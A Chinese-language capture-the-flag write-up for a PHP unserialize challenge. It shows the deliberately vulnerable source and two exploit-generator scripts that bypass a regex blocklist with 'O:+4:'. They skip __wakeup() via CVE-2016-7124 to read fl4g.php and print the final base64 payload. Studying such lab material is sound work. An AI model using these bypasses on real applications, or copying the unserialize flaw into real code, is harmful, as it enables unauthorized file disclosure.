攻防世界Web_php_unserialize
原始碼:
<?php
// Challenge source, intentionally vulnerable: a PHP object-injection chain
// (unserialize() -> __destruct() -> highlight_file()) that renders an
// attacker-chosen file.
class Demo
{
    // Private, so it serializes as s:10:"\0Demo\0file" (two NUL bytes).
    private $file = 'index.php';

    public function __construct($file)
    {
        $this->file = $file;
    }

    // Sink: whatever path ends up in $file is rendered on destruction; the @
    // hides errors for unreadable paths.
    public function __destruct()
    {
        echo @highlight_file($this->file, true);
    }

    // Intended guard: reset $file after unserialize(). It only runs when the
    // serialized property count matches the object (CVE-2016-7124 otherwise
    // skips it on unpatched PHP). Note the loose != comparison.
    public function __wakeup()
    {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

if (!isset($_GET['var'])) {
    highlight_file("index.php");
} else {
    $blob = base64_decode($_GET['var']);
    // Blocklist on the decoded blob: \d+ only matches bare digits, so a signed
    // length such as "O:+4:" slips through while (version-dependent) still
    // being accepted by unserialize().
    if (preg_match('/[oc]:\d+:/i', $blob)) {
        die('stop hacking!');
    }
    @unserialize($blob);
}
?>
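<?php
// Exploit generator for the "Web_php_unserialize" challenge.
//
// The target calls unserialize() on base64_decode($_GET['var']) and the
// object's __destruct() does highlight_file($this->file), so a Demo instance
// with $file = 'fl4g.php' reads the flag file. Two filters stand in the way:
//   1. preg_match('/[oc]:\d+:/i') rejects "O:4:". A signed length ("O:+4:")
//      is not matched by \d+ but is still parsed by unserialize() on the PHP
//      versions this challenge targets (verify on the actual target).
//   2. __wakeup() resets $file to 'index.php'. Declaring more properties than
//      the object really carries (":2:" instead of ":1:") skips __wakeup() on
//      PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124).
// Only the class name and the private property name/value matter for the
// serialized layout, so the methods of the real Demo class are not needed.
class Demo
{
    private $file = 'fl4g.php';
}

$payload = serialize(new Demo());
// O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
// The private property name carries two NUL bytes (hence length 10); they are
// invisible when printed, so never retype this string by hand.

// 1. Regex bypass, anchored to the object header: "O:4:" -> "O:+4:".
$payload = preg_replace('/^O:4:/', 'O:+4:', $payload, 1);
// 2. __wakeup bypass, anchored to this object's property count: 1 -> 2.
$payload = preg_replace('/^(O:\+4:"Demo":)1:/', '${1}2:', $payload, 1);
// O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}

// The target base64-decodes the parameter. Url-encode the result before
// putting it in the query string so "+", "/" and "=" survive the transport.
$encoded = base64_encode($payload);
print_r($encoded);
// TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
?>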
把 O:4 換成 O:+4 是為了繞過 preg_match 的正則：\d+ 只匹配純數字，帶正號的長度不會命中 [oc]:\d+:，但 unserialize() 在本題所用的 PHP 版本上仍會接受帶正號的長度（是否可用與 PHP 版本有關，請以實際環境驗證）。
preg_match('/[oc]:\d+:/i', $var) // [oc] 是字元類，匹配一個 o 或 c（對應序列化字串裡的物件 O: 與類別 C: 前綴）；\d+ 代表一個或多個數字，即長度欄位；結尾的 i 表示不分大小寫。這個黑名單只攔「字母:數字:」的寫法，所以在長度前多加一個 + 號就不會被匹配到。
preg_match用法:
查詢文字字串"php": <?php //模式分隔符後的"i"標記這是一個大小寫不敏感的搜尋 if (preg_match("/php/i", "PHP is the web scripting language of choice.")) { echo "查詢到匹配的字串 php。"; } else { echo "未發現匹配的字串 php。"; } ?>
同樣地，把屬性個數 1 改成 2 是利用了 CVE-2016-7124：當序列化字串中宣告的屬性個數大於實際屬性個數時，unserialize() 會跳過 __wakeup() 的執行，於是 $file 不會被重設回 index.php。此漏洞已在 PHP 5.6.25 / 7.0.10 修補，在更新的版本上這一步不會生效。
最後依題目要求把 payload 做 base64 編碼，以 GET 參數 var 送出即可。兩點注意：private 屬性名 \0Demo\0file 含有兩個不可見的 NUL 位元組（所以長度是 10），payload 務必用 serialize() 產生而不要手打；base64 結果放進 URL 前建議先 urlencode，避免 +、/、= 在查詢字串中被改寫。
參考:https://www.cnblogs.com/gaonuoqi/p/11896281.html
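<?php
// Exploit generator for the "Web_php_unserialize" challenge, using a local
// copy of the whole Demo class.
//
// Chain on the target: base64_decode($_GET['var']) -> unserialize() ->
// Demo::__destruct() -> highlight_file($this->file). Setting $file to
// 'fl4g.php' reads the flag, provided two filters are bypassed:
//   * preg_match('/[oc]:\d+:/i') on the decoded blob: a signed length
//     ("O:+4:") is not matched by \d+ but is still accepted by unserialize()
//     on the PHP versions this challenge targets (verify on the target);
//   * Demo::__wakeup() resets $file: declaring more properties than the
//     object carries (":2:" instead of ":1:") skips __wakeup() on
//     PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124).
class Demo
{
    private $file = 'index.php';

    public function __construct($file)
    {
        $this->file = $file;
    }

    // NOTE: this local copy of the destructor also fires when the generator
    // script exits, so it tries to highlight a local "fl4g.php"; the @ keeps
    // a missing file silent.
    function __destruct()
    {
        echo @highlight_file($this->file, true);
    }

    function __wakeup()
    {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$A = new Demo('fl4g.php');
$b = serialize($A);
// string(48) "O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}"
// The private property name is "\0Demo\0file": two NUL bytes that do not show
// when printed. Always generate the payload with serialize(); a hand-typed
// "Demofile" is 8 bytes and would not match the declared length 10.
if (strpos($b, "\0Demo\0file") === false) {
    die("unexpected serialized layout: " . bin2hex($b) . "\n");
}

// 1. Regex bypass, anchored to the object header: O:4: -> O:+4:
$b = preg_replace('/^O:4:/', 'O:+4:', $b, 1);
// 2. __wakeup bypass, anchored to this object's property count: 1 -> 2
$b = preg_replace('/^(O:\+4:"Demo":)1:/', '${1}2:', $b, 1, $patched);
if ($patched !== 1) {
    die("property-count patch did not apply: " . $b . "\n");
}
// string(49) "O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}"

// The target base64-decodes $_GET['var']; url-encode this before placing it
// in a query string so "+", "/" and "=" survive the transport.
echo (base64_encode($b));
// TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
?>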